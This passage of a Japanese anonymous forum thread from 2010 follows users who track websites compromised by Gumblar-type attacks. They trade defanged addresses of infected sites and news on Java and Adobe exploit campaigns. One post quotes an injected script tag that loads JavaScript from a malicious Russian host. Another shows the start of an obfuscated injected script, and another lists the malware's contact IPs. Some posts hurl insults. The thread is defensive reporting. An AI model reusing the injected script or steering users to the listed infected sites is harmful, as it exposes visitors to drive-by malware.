373:名無しさん@お腹いっぱい。
10/10/09 17:52:15
こういう上から目線のカスは死ねばいいと思うわ
報告してくれてるだけマシだろ
少なくともおまえのレスよりぜんぜんマシ
374:名無しさん@お腹いっぱい。
10/10/09 17:59:44
上から目線すぎる…
375:名無しさん@お腹いっぱい。
10/10/09 18:38:17
自己弁護乙
376:名無しさん@お腹いっぱい。
10/10/09 18:40:07
報告して「くれてる」とかイミフ
377:名無しさん@お腹いっぱい。
10/10/09 18:47:33
何かわかんないときは質問スレ行くといいよ
ここはどっちかっていうと明らかなやつについて情報交換するスレ
378:名無しさん@お腹いっぱい。
10/10/09 20:13:31
上から目線の使い方が明らかに間違ってる
379:名無しさん@お腹いっぱい。
10/10/10 00:31:53
>>371 >>373
Yahoo!ブログは初めてか? 力抜けよ、どこも同じだから
yimg.jpはYahoo!のファイル置き場な
380:名無しさん@お腹いっぱい。
10/10/10 11:26:52
というかyimgはyahoo関係の画像とかだね
381:名無しさん@お腹いっぱい。
10/10/10 21:34:44
取扱注意
未対応&再改竄のため再掲載
サイバーギグス
www●movie-aa●com/
・JSUNPACK
3c77eaea56260e02a480ebf8e2bff22b39636c3b
絶賛放置&崩壊中
iiji●biz/
文字化けして読めませんw
382:/名無しさん[1-30] ◆.htmlint.U
10/10/11 00:35:26
>>381
おつですん。
上 二回目 無視かのぉ。。。
下 WHOISからメルってみました。
383:名無しさん@お腹いっぱい。
10/10/11 11:13:40
教えてください
body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/
はaguse.jpでチェックすると
<script type="text/javascript" src="URLリンク(pantscow)●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。
なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?
384:名無しさん@お腹いっぱい。
10/10/11 11:49:31
わかりました。
sales-agency●jp/flv/swfobject●js
の末尾にありました
385:名無しさん@お腹いっぱい。
10/10/11 17:07:55
>>384
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる
Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも
386:名無しさん@お腹いっぱい。
10/10/11 22:32:11
【VB】ウィルスバスター2011【クラウド】
スレリンク(sec板)
387:名無しさん@お腹いっぱい。
10/10/12 01:15:55
swfobject●jsが切れたので魚拓等
URLリンク(megalodon.jp)
URLリンク(jsunpack.jeek.org)
URLリンク(megalodon.jp)
388:名無しさん@お腹いっぱい。
10/10/12 09:55:02
caroll-amadea.bl0gger.eu/100531/p2/
389:名無しさん@お腹いっぱい。
10/10/12 18:28:56
1~6の頃の住人だったけど、もうペース落ちてきたね。
諸々の対策が効果を出してきたか、改ざんが分かりにくくなったか?
390:名無しさん@お腹いっぱい。
10/10/12 22:34:50
パスワードの強制変更がよかった
[止まらぬサイト改ざん(1) ISPがガンブラー対策~パスワードリセット敢行も]
URLリンク(www.so-net.ne.jp)
[ 止まらぬサイト改ざん(3):全ユーザー「FTPパスワード強制変更」の効果]
URLリンク(www.so-net.ne.jp)
sakuraは1月と比べて241→ 770と増えてるみたいだけどね
URLリンク(mimizun.com)
391:名無しさん@お腹いっぱい。
10/10/12 23:57:38
> ・aguse
> URLリンク(www.aguse.net)
糞仕様になったな
392:名無しさん@お腹いっぱい。
10/10/13 04:04:49
Janeのコマンドで見れないなと思ったら
393:名無しさん@お腹いっぱい。
10/10/16 07:21:22
最近めっきり話題無いなw
もういいのか?
394:名無しさん@お腹いっぱい。
10/10/16 09:44:27
改竄攻撃は攻撃者の気分次第だから何とも・・・
MicroAdみたいのはいつでも起こりうるから「もういい」なんてなしす
gumblar → 活動継続中、相変わらず日IPは弾かれる
8080 → 先月から活動が鈍い感じ? 今週は小康状態
395:名無しさん@お腹いっぱい。
10/10/16 23:07:46
今は日本のIPアドレスは弾くのか・・・
感染するような奴はいつもだいたい同じだから
新しい感染者を出すには別の国を短期集中的にやるのか?
396:名無しさん@お腹いっぱい。
10/10/20 01:42:55
[ゲームのニュース/ショップでの状況等のブロク] ファミコンプラザゲーム最新情報ページ
p://www■famicom-plaza■com/blog/
10月18日 AM5:00頃~AM11:00 にサイトに訪れた人にガンブラーの感染の疑い有りだそうです。
現在は上のページは復旧しているようです。
397:名無しさん@お腹いっぱい。
10/10/20 03:38:37
URLリンク(nes3)<)◎k2◎xrea◎com/comic/
URLリンク(click-no1)<)◎net/pet/?feed=rss2
URLリンク(www)<)◎citydusk◎com/
失敗例含むかも
398:名無しさん@お腹いっぱい。
10/10/20 11:18:01
古い型が多いな
399:名無しさん@お腹いっぱい。
10/10/20 21:41:25
[エフセキュアブログ : そのApacheのモジュールは本物ですか?]
URLリンク(blog.f-secure.jp)
.soファイル↓とやらを利用する亜種があるそうな
[動的共有オブジェクト (DSO) サポート - Apache HTTP サーバ]
URLリンク(httpd.apache.org)
400:名無しさん@お腹いっぱい。
10/10/21 23:32:41
>397
click-no1 はY知恵袋の質問文を引っ張ってきたものなので改ざんされてない
(ワードサラダなごみサイトだが)
401:名無しさん@お腹いっぱい。
10/10/22 00:00:38
Kasperskyのサイト改ざん ユーザーを偽サイトに転送
URLリンク(www.itmedia.co.jp)
402:名無しさん@お腹いっぱい。
10/10/22 10:35:56
カスペった
403:名無しさん@お腹いっぱい。
10/10/23 00:51:29
>>401
隠蔽とか、完璧にオワタwwww
404:名無しさん@お腹いっぱい。
10/10/23 18:29:19
ウィルス対策ソフトの会社が改ざんされ
それを隠蔽するも改ざんされてた事がバレる
信頼度0%になってしまった
405:名無しさん@お腹いっぱい。
10/10/23 19:10:32
ESETの仲間入りだなw
406:名無しさん@お腹いっぱい。
10/10/23 23:04:45
オパーイ詐称CMなんか流してる場合じゃねぇw
407:名無しさん@お腹いっぱい。
10/10/23 23:59:50
AKBという白アリ寄生虫なんかをCMに使うからだ
408:名無しさん@お腹いっぱい。
10/10/25 16:33:24
国内100社以上で感染被害を確認。”mstmp” ”lib.dll” のファイル名で拡散する不正プログラム
URLリンク(blog.trendmicro.co.jp)
URLリンク(www.rbbtoday.com)
URLリンク(journal.mycom.co.jp)
409:名無しさん@お腹いっぱい。
10/10/25 17:14:31
>>408の情報って、あんま無いね。
410:名無しさん@お腹いっぱい。
10/10/25 17:35:40
まぁ既にありふれた物になっちゃったgumblar/8080の亜種だしねぇ
411:名無しさん@お腹いっぱい。
10/10/25 17:43:22
ユーザーに対しては、「OS、アプリケーションを最新の状態にする」
「最新バージョンのセキュリティソフトを導入し、最新の状態に保つ」という2点を
改めて徹底するよう呼びかけている。
URLリンク(internet.watch.impress.co.jp)
Javaの脆弱性を悪用する不正プログラム「JAVA_AGENT.P」
412:名無しさん@お腹いっぱい。
10/10/25 18:28:01
JREが1.6.0_22ならmstmpはダウンロードすらされないらしいと聞いた。
413:名無しさん@お腹いっぱい。
10/10/25 19:30:28
>>408
これってマイクロアドのヤツか?
GIGAZINEでは'Security Tool'の他に
メディアプレーヤ、pdf、JARの脆弱性も利用されたみたいだし
「mstmp」系ウィルス補完計画
URLリンク(d.hatena.ne.jp)
414:名無しさん@お腹いっぱい。
10/10/26 02:03:36
ガンブラー流行ったのって去年の12月前後だったよね。
全然収束しなかったね。ガンブラーに関しては警察も動く的な記事を読んだ気もするけど・・
415:名無しさん@お腹いっぱい。
10/10/26 09:24:46
インターネット絶滅に都合がいいから放置してるんじゃね
416:名無しさん@お腹いっぱい。
10/10/26 09:51:42
GumblarとConfickerの戦い
URLリンク(www.youtube.com)
2010年上半期までは6:4とGumblar優勢だったはずが、
下半期に入りConfickerが逆転し、王者交代が行われた模様
だそうで(企業の話で一般家庭の話ではないみたい)
417:名無しさん@お腹いっぱい。
10/10/26 12:53:16
URLリンク(dougikai-jimin.jp)
418:名無しさん@お腹いっぱい。
10/10/26 13:19:26
このまま進化すると最終的に生活インフラにまで悪影響を及ぼしかねない勢いだ
実は産業にダメージを与えるための兵器なのかもしれんな
419:名無しさん@お腹いっぱい。
10/10/26 15:29:36
おれんところは、記憶力が落ちた祖母のところにあるPCの感染が不安だがな
ほんと、よくできたウィルスつくりやがって
420:名無しさん@お腹いっぱい。
10/10/26 22:31:59
新しいウィルスは、上記の対策でいまのとこOK?
421:名無しさん@お腹いっぱい。
10/10/26 23:03:56
どれのこといってんのかわからんけどだいたいおk
基本が大事なのです
各ソフトウェアのバージョンはちゃんと確認しなおしてね!
422:名無しさん@お腹いっぱい。
10/10/26 23:15:27
>>421
国内100社以上で感染被害を確認。?mstmp? ?lib.dll? のファイル名で拡散する不正プログラム
URLリンク(blog.trendmicro.co.jp)
URLリンク(www.rbbtoday.com)
URLリンク(journal.mycom.co.jp)
上記のウィルス
一応、JAVAは、最新版、導入しました
423:名無しさん@お腹いっぱい。
10/10/27 01:21:48
攻撃プログラムがJREのバージョンを見て、対象の脆弱性があるバージョンの場合は攻撃開始。
最新版を含む対象の脆弱性がないバージョンの場合は何もせずスルーするらしい。
424:名無しさん@お腹いっぱい。
10/10/27 13:18:16
>>420
古いJREが残る場合もあるようだから消しとくといいのかも。
425:名無しさん@お腹いっぱい。
10/10/27 19:21:58
>>413
> これってマイクロアドのヤツか?
マイクロアドじゃなくて、どこかのアクセス解析サービスらしい
アクセス解析サービスを使用した Web サイト経由での攻撃に関する注意喚起
URLリンク(www.jpcert.or.jp)
426:名無しさん@お腹いっぱい。
10/10/27 19:29:35
そのアクセス解析サービスはどこなんだろう?
本来は、そこをきちんと公開するべきじゃないのかな?
427:名無しさん@お腹いっぱい。
10/10/27 23:35:39
[「mstmp」系ウイルス(仮称) に感染しているか確認する方法 ? にわか鯖管の苦悩日記]
URLリンク(kikuz0u.x0.com)
428:名無しさん@お腹いっぱい。
10/10/28 00:15:55
>>426
既に分かってるんだけど、JPCERTが言わないからまだ野放しにされている。
指摘を受けたところは調査中らしいけど。
↓
URLリンク(d.hatena.ne.jp)
429:名無しさん@お腹いっぱい。
10/10/28 08:25:28
知ってる人は匿名掲示板(笑)とかどこかに書いてもいいのにね
アクセス解析というとxreaは昔やられてたな
430:sage
10/10/28 14:28:35
知ってる人は知ってるからじゃね?
431:名無しさん@お腹いっぱい。
10/10/28 16:30:02
[36億スパム配信の凶悪ボットネットが解体 G DATA]
URLリンク(gdata.co.jp)
↓スクリプトでリダイレクトされるファイルが昨日も更新されてる
netdekase5●sakura●ne●jp
shimadaaqua●sakura●ne●jp
umeshin●sakura●ne●jp
432:名無しさん@お腹いっぱい。
10/10/28 16:32:45
いきなり襲ってきた「mstmp」ウィルスに大わらわ
URLリンク(itpro.nikkeibp.co.jp)
413,428に引用されているblogの人が、経緯について詳しく説明している
433:名無しさん@お腹いっぱい。
10/10/28 16:45:21
>>431
G DATAが言ってるのはGumblar 8080系の事で、Gumblar.xはまだ生きてるらしい
434:名無しさん@お腹いっぱい。
10/10/28 17:13:46
Gumblar.xも日本弾きは継続中らしいから
海外の串でも使わんと影響ないだろ
435:名無しさん@お腹いっぱい。
10/10/28 21:54:58
取扱注意
www●mypondstore●com/ThumbnailFrame●htm
↓
<script>var XepaZerc='・・・・・
今騒いでるのはコイツだろ?
436:名無しさん@お腹いっぱい。
10/10/28 22:06:09
flashplayerもjavaもMSUPDATEから出来ればもっと被害者減りそうなもんだが
437:名無しさん@お腹いっぱい。
10/10/29 07:33:28
>>431
8080の方は更新止まってる
Gumblar.xが挿入してる「~php」の部分が絶賛更新中
438:名無しさん@お腹いっぱい。
10/10/29 08:44:32
Adobeの脆弱性が来たよん
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
Release date: October 28, 2010
Flash Playerはby November 9, 2010
Adobe Reader and Acrobatはduring the week of November 15, 2010
URLリンク(www.adobe.com)
439:名無しさん@お腹いっぱい。
10/10/29 10:54:53
いっそのことFlashもクラウド化すりゃいいのに…
アップデートめんどい
440:名無しさん@お腹いっぱい。
10/10/29 11:29:58
>>439
イミフ
441:名無しさん@お腹いっぱい。
10/10/29 11:34:57
また勘違いクラウドかw
442:名無しさん@お腹いっぱい。
10/10/29 11:51:01
脳みそもクラウド化
443:名無しさん@お腹いっぱい。
10/10/29 12:01:05
“クラウド型”のウイルス対策ソフトってぶっちゃけどうなの?
スレリンク(news板)
444:名無しさん@お腹いっぱい。
10/10/29 12:18:22
クラウドw
セフィロスw
445:名無しさん@お腹いっぱい。
10/10/29 15:12:02
スレリンク(news板:32番)
catv?の人は去年から ここの感染URLを張り続けてますよね
そういう仕事なの?セキュリティ関連会社とか
446:名無しさん@お腹いっぱい。
10/10/29 15:22:57
まぁほとんど狙われないんだけどついでに
Shockwave Player 11.5.9.615
URLリンク(www.adobe.com)
447:名無しさん@お腹いっぱい。
10/10/29 21:41:03
URLリンク(hissi.org)
URLリンク(hissi.org)
スレ立て依頼してウイルスリンク張るのが
最近のスタイルなのかしら
448:名無しさん@お腹いっぱい。
10/10/30 00:26:53
>>438
■【ゼロデイ攻撃】Adobe Reader/Flash Playerの未修整の脆弱性狙うトロイの木馬
URLリンク(www.so-net.ne.jp)
>Adobe Reader/Acrobat 9.4およびそれ以前のバージョン
>Flash Player 10.1.85.3およびそれ以前のバージョン
■APSA10-05: Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat(セキュリティホールmemo)
URLリンク(www.st.ryukoku.ac.jp)
今年何回目のゼロデイだよw
449:名無しさん@お腹いっぱい。
10/10/30 00:46:28
ゼロデイの多さは人気の証(キリッ
なのにFlashを排除するAppleはおかしい
450:名無しさん@お腹いっぱい。
10/10/30 01:46:52
アドベはもう本気で死ねよ
やる気無いならさっさと辞めちまえ!
451:名無しさん@お腹いっぱい。
10/10/30 04:23:50
もうsilverlightでいいよ
452:名無しさん@お腹いっぱい。
10/10/30 10:46:20
>>442
激しくワロタw
453:名無しさん@お腹いっぱい。
10/10/30 10:49:01
ここまで執拗に adobe が狙われるのって、流石に何らかの意図を感じるね…
何の利害関係も無いスーパーハカーが、狙いやすいからやってるとかの問題じゃないような気がするんだけど…
454:名無しさん@お腹いっぱい。
10/10/30 11:07:43
狙われてるのは利用者が多い上に脆弱性があるからだよ
455:名無しさん@お腹いっぱい。
10/10/30 13:28:36
日数が経てばセキュリティソフトが対応するから、
ゼロデイ放置のほうが安全なような気がしてきたw
456:名無しさん@お腹いっぱい。
10/10/30 16:56:49
そんなわけないだろアホか
457:名無しさん@お腹いっぱい。
10/10/30 17:02:33
>>455
URLリンク(internet.watch.impress.co.jp)
>Flash Playerでは、Windows/Macintosh/Linux/Solaris版のバージョン10.1.85.3以前と、Android版の10.1.95.2以前が影響を受ける。
458:名無しさん@お腹いっぱい。
10/10/31 08:45:16
オレーシャ・ソロキナ豚が何たらこうやらwww
459:名無しさん@お腹いっぱい。
10/10/31 08:47:25
フジテレビで特集中
460:名無しさん@お腹いっぱい。
10/10/31 09:35:26
親が喧嘩ふっかけてきて、ろくに見れんかった
461:名無しさん@お腹いっぱい。
10/10/31 11:01:12
やっぱyoutubeやニコニコも狙われてるのかな?
462:名無しさん@お腹いっぱい。
10/10/31 16:42:46
Flash Playerの脆弱性狙いはFIREFOXの場合はStop AutoplayかFlash Blockで
flashを遮断すれば大丈夫なのでしょうか?
463:名無しさん@お腹いっぱい。
10/10/31 18:44:59
>>462
意味茄子
464:名無しさん@お腹いっぱい。
10/10/31 22:03:15
Flash Playerアンインスコおすすめ
465:名無しさん@お腹いっぱい。
10/11/01 01:46:18
>>462
Flash Playerは代替品が無いというのが痛いなw
466:名無しさん@お腹いっぱい。
10/11/01 10:46:53
さっさとHTML5(笑)標準化しろよ
まあそうなると98以前では動画とか見れなくなるが…
467:名無しさん@お腹いっぱい。
10/11/01 13:11:30
国内の多数サイトに影響、JRE悪用するウイルス感染について注意
株式会社ラックは10月29日、国内の多数のサイトで発生したガンブラー型攻撃による
ウイルス感染の実態について、特徴や手口の傾向が判明したとして、注意喚起を公表した。
ウイルスが接続を試みるIPアドレスは、以下のアドレス。
[64.27.25.223]、[64.27.25.224]、[88.80.7.152]、[85.17.209.3]、
[95.211.111.229]、[95.211.108.93]、[178.63.62.19]
URLリンク(internet.watch.impress.co.jp)
468:名無しさん@お腹いっぱい。
10/11/01 15:46:41
↑
>今回確認された攻撃ではJava Runtime Environment(JRE)の脆弱性(CVE-2008-5353)を悪用することが確認された。
>ラックでは、多くの組織で社内システムやパッケージソフトに付属するそれぞれのJREを使用しているケースが見受けられ、
>そのためにJREのセキュリティ対策を適切に取れず、被害が相当数の企業に拡散していることが推測されるとしている。
CVE-2008ってことは2年前かと思ったら[CVE-2010-0094]もあるらしい
[アフィリエイトによる金銭取得が目的か!? -“mstmp””lib.dll”攻撃続報 | トレンドマイクロ セキュリティ ブログ]
URLリンク(blog.trendmicro.co.jp)
469:名無しさん@お腹いっぱい。
10/11/01 17:17:15
CVE-2010-0094でも3月のJava6Update19で修正されているんだから
半年も放置して感染したボンクラが救いようもないことにかわりはない
470:名無しさん@お腹いっぱい。
10/11/01 17:20:47
【GENOウイルス注意!】Java(JRE)の脆弱性を悪用するウイルス感染の特徴や手口が判明した模様
スレリンク(news板)
471:名無しさん@お腹いっぱい。
10/11/01 22:18:10
>>470
>>447
URLリンク(hissi.org)
472:名無しさん@お腹いっぱい。
10/11/02 15:25:37
JAVA入れてなかった
473:名無しさん@お腹いっぱい。
10/11/02 22:52:40
超CGキタ━━━(゚∀゚)━━━ !!!!!
474:名無しさん@お腹いっぱい。
10/11/02 22:53:28
誤爆したすまん
475:名無しさん@お腹いっぱい。
10/11/03 00:54:11
Gumblar8080攻撃のその後 ~Bredolabは本当に死んだのか~
URLリンク(www-950.ibm.com)
「8080は滅びぬ、何度でも蘇るさ」
476:名無しさん@お腹いっぱい。
10/11/03 03:36:46
skyhigh-read●com/
ブラウザとavastが反応
これはガチ?
477:名無しさん@お腹いっぱい。
10/11/03 04:00:29
>>476
>>475
■オランダ当局がBredolabボットネットを閉鎖~関連不明も8080系攻撃は停止中
URLリンク(www.so-net.ne.jp)
突っ込まれてるコード(URL)は現時点では無害。
・・だが、この先どうなるかは誰も知らん。
478:名無しさん@お腹いっぱい。
10/11/03 04:02:23
470のスレがDAT落ちしているようだが続きが気になる
479:名無しさん@お腹いっぱい。
10/11/03 04:11:15
>>477
把握
480:名無しさん@お腹いっぱい。
10/11/03 10:54:41
>>478
これのこと
genoウイルスとかなってるがぜんぜん関係ない
URLリンク(blogs.yahoo.co.jp)
481:名無しさん@お腹いっぱい。
10/11/03 17:37:18
>>480
ありがとう
482:名無しさん@お腹いっぱい。
10/11/03 21:29:08
>>480
>ぜんぜん関係ない
その記事には「ガンブラー型攻撃」って書いてあるし
Gumblarで盗まれたアカウントが使われたかもよ
多サイトにスクリプトを置く、価値の高いアカウントだから変化をつけたとか
マイクロアドのも似てるし
URLリンク(gw.aguse.jp.nyud.net)
>悪者は盗んだアカウント情報を“温存”している?
483:482
10/11/03 21:33:43
ごめん、「その記事」じゃなくて>>470の元ネタの記事だった
484:名無しさん@お腹いっぱい。
10/11/04 07:23:33
[【要注意】現在「ウェブ魚拓」がウィルスに感染している模様 : 馬鹿の野望byはなゆー]
URLリンク(kitamakura.seesaa.net)
485:名無しさん@お腹いっぱい。
10/11/04 08:25:53
まー マジであっちこっちに感染してるなー
ほんとに仮想PCでネットすること考えないとダメかこりゃ
486:名無しさん@お腹いっぱい。
10/11/04 08:33:26
おかしいと思ったらこのざまorz
魚拓踏みまくってるしw
487:名無しさん@お腹いっぱい。
10/11/04 11:33:54
>>484
ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの?
488:名無しさん@お腹いっぱい。
10/11/04 12:31:29
感染してたら
そのまま保存されるからな
489:名無しさん@お腹いっぱい。
10/11/04 13:30:32
魚拓を取ろうとするとエラーが出たり
表示できても時間を置くと見れなくなる
10月31日以降の魚拓が見れない異常事態
URLリンク(megalodon.jp)
URLリンク(megalodon.jp)
"Nine-Ball"ってGumblar型の攻撃だと思うけど
魚拓に対しての攻撃みたいだ
490:名無しさん@お腹いっぱい。
10/11/04 13:54:33
infoseekの無料版が終了する影響で負荷増加とかにしても期間長いしね
491:名無しさん@お腹いっぱい。
10/11/04 14:06:36
ガンブラー?ウェブ魚拓が感染 か
スレリンク(news板)
492:名無しさん@お腹いっぱい。
10/11/04 20:43:08
ウェブ魚拓スレより
91 名無しさん@お腹いっぱい。 [sage] 2010/11/04(木) 20:21:19 ID: Be:
株式会社アフィリティー ≫ Blog Archive ≫ ウェブ魚拓がウイルスに感染したという情報が流れている件につきまして
URLリンク(www.affility.co.jp)
493:名無しさん@お腹いっぱい。
10/11/04 20:44:11
>>492
リンク先より一部抜粋
>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。
>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。
494:名無しさん@お腹いっぱい。
10/11/04 21:56:34
【無】の中の人へ
「ソコ」は.htaccessやられてるみたいだぬ。
>ちょめちょめ●ru/mymap/
referer:ちょめちょめ●ru/mymap/
→404 Not Found
referer:www.帝國.com/
→iframe イパーイ
危険なので以下略とす
495:494
10/11/04 22:01:46
追記
UA見てるから、IE6(笑)とかで凸すr(ry
496:/名無しさん[1-30] ◆.htmlint.U
10/11/04 22:07:06
(・3・) エェー
(・3・) リファラ当てるの苦手YO
.htaccessかお。。。
497:/名無しさん[1-30] ◆.htmlint.U
10/11/04 22:15:50
あっ誤爆。
【無】の中の人とは違いますお。
498:名無しさん@お腹いっぱい。
10/11/04 23:14:10 BE:2730903168-PLT(20000)
>>483
URLリンク(internet.watch.impress.co.jp)
これですか?
499:名無しさん@お腹いっぱい。
10/11/04 23:44:01
株式会社アフィリティー ≫ Blog Archive ≫ ウイルス正体判明
URLリンク(www.affility.co.jp)
一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
~中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。
これから感染したサイトの魚拓はとらない方が良さそうだね
500:名無しさん@お腹いっぱい。
10/11/04 23:54:56
ウイルスソフト……?
501:名無しさん@お腹いっぱい。
10/11/05 08:53:29
XP使うならJavaもFlashもPDFも無効にしろ、
JavaやFlashやPDF使うなら、Vista以降で保護モード使え
一般社員には管理者権限でログインさせんな
ってことでだいたい防御できるのにね
502:名無しさん@お腹いっぱい。
10/11/05 11:33:01
Flash 10.1.102.64になったよ
503:名無しさん@お腹いっぱい。
10/11/05 12:58:27
そのうちAndroidでも脆弱性つかれたりするんだろう
そうなったら被害が怖いな
ほんとうにFlashはこの先無くなったほうがいいかもね
ジョブズの気持ちも分からんでもない